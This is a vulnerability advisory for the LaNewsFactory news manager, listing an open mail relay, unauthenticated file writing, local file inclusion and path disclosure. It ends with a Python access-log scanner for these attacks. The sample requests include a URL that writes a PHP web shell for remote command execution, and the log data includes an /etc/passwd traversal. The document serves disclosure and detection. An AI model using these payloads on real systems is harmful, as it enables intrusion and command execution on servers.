LaNewsFactory Multiple Remote Vulnerabilities

http://www.salvatorefresta.net/files/adv/LaNewsFactory%20Multiple%20Remote%20Vulnerabilities-19042010.txt

Name               LaNewsFactory
Vendor             Christophe Brocas
Versions Affected  <= 1.0.0
Author             Salvatore Fresta aka Drosophila
Website            http://www.salvatorefresta.net
Contact            salvatorefresta [at] gmail [dot] com
Date               2010-04-19

X. INDEX

I.   ABOUT THE APPLICATION
II.  DESCRIPTION
III. ANALYSIS
IV.  SAMPLE CODE
V.   FIX
VI.  DISCLOSURE TIMELINE

I. ABOUT THE APPLICATION

This is a widely used news manager that does not require a database.

II. DESCRIPTION

This news manager is affected by several vulnerabilities that allow a guest to write arbitrary files on the system, include local files, read local files, and more.

III. ANALYSIS

Summary:

A) Anonymous email
B) Remote File Writing
C) Multiple Local File Inclusion
D) Full Path Disclosure

A) Anonymous email

The mailto.php file allows a guest to send arbitrary emails. The input is not properly sanitised: only the two addresses are checked, while the comments and the From header reach mail() unvalidated.

    if (ValidEmailAdress($youremail) and ValidEmailAdress($friendemail)) {
        // $youremail, $friendemail and $comments come from the request and are passed to mail() as-is
        mail ($friendemail, $display[$lang]["mailtoafriend"],
              "$comments\n\n".$url."print".$LNF_file_extension."?art=$newsfilename\n\n$yourname",
              "From: $youremail");
    }

B) Remote File Writing

The save-edited-news.php file allows a guest to write a file on the system. This vulnerability may be used to execute remote commands on the system.

C) Multiple Local File Inclusion

Many files pass unsanitised input to the PHP include function. This vulnerability may be used to execute remote commands by including the Apache log file.

D) Full Path Disclosure

For example, the print.php file prints many error messages that include the full path of the file. This path may be very useful for local file inclusion and other attacks.

IV. SAMPLE CODE

A) Anonymous email

mailto.php?friendemail=target@email.com&youremail=ano@email.com&comments=suck!

B) Remote File Writing to Remote Command Execution

save-edited-news.php?art=news/file.php&corps=<?php system($_GET[cmd]); ?>

D) Full Path Disclosure

print.php?art=-1.xml

V. FIX

No fix.

VI. DISCLOSURE TIMELINE

2010-04-19  Bugs discovered
2010-04-19  Advisory released
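Added detection example, not part of the advisory above: this Python scans Apache access-log lines for the request patterns sections III and IV describe, namely a PHP file name or PHP tag sent to save-edited-news.php, path traversal in the art parameter that the include calls consume, and bursts of mailto.php requests from one source. The log lines, the /lnf/ script path and the threshold of three mailto.php requests are constructed assumptions, not values from the advisory.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs
# Constructed Apache access-log lines for the demo (not taken from the advisory).
SAMPLE_LOG = """\
10.0.0.5 - - [19/Apr/2010:10:00:01 +0000] "GET /lnf/index.php HTTP/1.1" 200 512
10.0.0.7 - - [19/Apr/2010:10:00:02 +0000] "GET /lnf/save-edited-news.php?art=news/file.php&corps=%3C%3Fphp+system%28%24_GET%5Bcmd%5D%29%3B+%3F%3E HTTP/1.1" 200 88
10.0.0.7 - - [19/Apr/2010:10:00:03 +0000] "GET /lnf/print.php?art=../../../etc/passwd HTTP/1.1" 200 9812
10.0.0.9 - - [19/Apr/2010:10:00:04 +0000] "GET /lnf/print.php?art=42 HTTP/1.1" 200 2048
10.0.0.7 - - [19/Apr/2010:10:00:05 +0000] "GET /lnf/mailto.php?friendemail=a%40example.org&youremail=b%40example.org&comments=hi HTTP/1.1" 200 30
10.0.0.7 - - [19/Apr/2010:10:00:06 +0000] "GET /lnf/mailto.php?friendemail=c%40example.org&youremail=b%40example.org&comments=hi HTTP/1.1" 200 30
10.0.0.7 - - [19/Apr/2010:10:00:07 +0000] "GET /lnf/mailto.php?friendemail=d%40example.org&youremail=b%40example.org&comments=hi HTTP/1.1" 200 30
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)')
TRAVERSAL = re.compile(r'(^|[\\/])\.\.([\\/]|$)|\x00|^[\\/]')  # ../ or ..\, NUL byte, absolute path
PHP_FILE = re.compile(r'\.ph(p\d?|tml?)$', re.I)              # .php, .php5, .phtml, .phtm
MAILTO_THRESHOLD = 3  # mailto.php requests from one IP before flagging (assumed tuning value)

def analyse_request(target):
    """Return the rule names triggered by one request-target string."""
    parts = urlsplit(target)
    script = parts.path.rsplit('/', 1)[-1].lower()
    params = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    art, corps = params.get('art', ''), params.get('corps', '')
    hits = []
    if TRAVERSAL.search(art):
        hits.append('lfi-traversal')          # C) art= reaches include() in several files
    if script == 'save-edited-news.php':
        if PHP_FILE.search(art):
            hits.append('write-php-file')     # B) target file name would be executed by PHP
        if '<?' in corps:
            hits.append('php-tag-in-body')    # B) PHP code in the news body being written
    return hits

def scan_log(text):
    """Yield (ip, rule, target) findings for an access log, plus per-IP mailto.php bursts."""
    mail_count = Counter()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target = m.group('ip'), m.group('target')
        for rule in analyse_request(target):
            yield ip, rule, target
        if urlsplit(target).path.lower().endswith('/mailto.php'):
            mail_count[ip] += 1
            if mail_count[ip] == MAILTO_THRESHOLD:  # A) anonymous mail relay abuse
                yield ip, 'mailto-burst', target
```

scan_log() is a generator: iterate it over the text of a real access log to list the findings, and tune MAILTO_THRESHOLD to the site's normal mailto.php traffic.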